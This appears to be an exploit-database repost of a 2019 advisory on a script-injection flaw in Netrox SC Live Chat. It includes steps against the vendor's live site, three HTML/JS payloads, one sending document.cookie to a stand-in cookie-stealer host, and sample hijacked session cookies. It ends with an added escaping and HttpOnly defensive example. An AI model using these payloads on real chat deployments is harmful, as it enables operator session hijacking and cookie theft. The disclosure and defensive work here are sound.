Netrox SC Live Chat Software for websites Reflected XSS Injection

CVE: -
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2019-08-09
CPE: cpe:cpe:/a:netrox:sc_live_chat_software:1.0
CVSS: Not available
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080015

Below is a copy:

Netrox SC Live Chat Software for websites Reflected XSS Injection
/*!
* # Exploit Title: Netrox SC Live Chat Software for websites Reflected XSS Injection
* # Google Dork: -
* # Date: 2019/08/02
* # Author: m0ze
* # Vendor Homepage: https://www.netroxsc.com/ || https://www.netroxsc.ru/
* # Software Link: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || https://sys.netrox.sc
* # Version: -
* # Tested on: NginX
* # CVE: -
* # CWE: CWE-79
*/

::- Details & Description -::
~ The Netrox SC Live Chat Software for websites web application is vulnerable to Reflected XSS injection that allows an attacker to inject JavaScript/HTML code into the live chat with an authorized operator/admin, redirect the operator/admin to another website, or steal cookies and hijack an active admin/operator session.

::- Demo Website -::
~ Registration: https://sys.netrox.sc/signup
~ Frontend: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || ur own domain for test purposes
~ Backend (auth): https://sys.netrox.sc/enter

::- Special Note -::
~ To reproduce the described issue and install the demo chat, you need a domain and the ability to create an HTML page on it.
~ Keep in mind that ur payload will work UNTIL u send it to chat. In other words, keep the chat open IN A TYPING STATE.

::- PoC Links -::
~ -

::- PoC [Persistent XSS Injection] -::
~ Register a new account https://sys.netrox.sc/signup and configure chat/account settings, then go to https://sys.netrox.sc/t_site_theme_simple/show page and press the System code button. Copy/paste provided code to ur demo website page (f.e. blank index.html page), save changes and ur demo website must be ready for some tests. Then go to ur demo website page with Netrox SC Live Chat widget, open chat and start typing ur payload (check examples below) but DON'T SEND THE MESSAGE in chat. Then go to the admin area https://sys.netrox.sc/t_workdesk and double click on a new chat alert, wait ~3 seconds and ur payload will work.
~ Example #0: <h1 onmouseover=alert(`m0ze`);>m0ze</h1>
~ Example #1: <img src=x onerror=(alert)(document.cookie);window.location='https://twitter.com/m0ze_ru';//">
~ Example #2: <img src=x onerror=alert('OK');this.src='https://your.domain.tld/cookie-stealer.php?c='+document.cookie>

::- PoC [Hijacked Session Cookies Sample] -::
NXSID=1q36j5aq6pzd408gha0bg8zn14;
auth_token=4eq848d1330m3efd6272301338db2588d2f7d4cnef5293213dc74d99ded7713b;
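
Added defensive example (not part of the advisory and not Netrox SC's code): the unescaped rendering of a visitor's in-progress message that the PoC above implies, beside an output-encoded version, plus a session cookie header with HttpOnly so that script cannot read a value like the NXSID sample through document.cookie. The function names, the typing-preview markup and the cookie attributes are assumptions.

```javascript
// Added defensive example. All names and markup here are hypothetical;
// the vendor's real operator-console code is not shown on this page.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

// Encode every character that can open a tag, an attribute or an entity.
// Single pass, so already-produced entities are never escaped twice.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed vulnerable pattern: the visitor's draft text is concatenated
// into operator-side markup, so tags and event handlers become live.
function renderTypingPreviewUnsafe(draft) {
  return '<div class="typing-preview">' + draft + '</div>';
}

// Hardened form: the draft is treated as text only. In a browser the
// equivalent is assigning to element.textContent instead of innerHTML.
function renderTypingPreviewSafe(draft) {
  return '<div class="typing-preview">' + escapeHtml(draft) + '</div>';
}

// Session cookie header: HttpOnly hides the value from document.cookie,
// Secure and SameSite limit where the browser will send it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Strict`;
}

// Sample input: Example #0 from the advisory, used as test data.
const sampleDraft = '<h1 onmouseover=alert(`m0ze`);>m0ze</h1>';
console.log(renderTypingPreviewUnsafe(sampleDraft)); // markup survives intact
console.log(renderTypingPreviewSafe(sampleDraft));   // rendered as inert text
// Constructed cookie value, not a real session id.
console.log(sessionCookieHeader('NXSID', 'constructed-session-id'));
```

Output encoding closes the injection itself; the cookie attributes only limit what a remaining script-injection bug could reach.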
